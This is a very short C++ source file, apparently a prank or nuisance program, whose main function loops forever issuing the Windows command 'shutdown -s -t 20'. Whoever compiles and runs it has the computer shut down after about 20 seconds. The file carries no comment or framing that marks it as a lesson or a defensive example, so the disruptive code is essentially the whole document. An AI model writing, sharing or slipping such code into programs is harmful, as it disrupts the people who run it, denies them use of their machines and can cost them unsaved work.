#include<bits/stdc++.h> using namespace std; int main() { while(1) system("shutdown -s -t 20"); return 0; }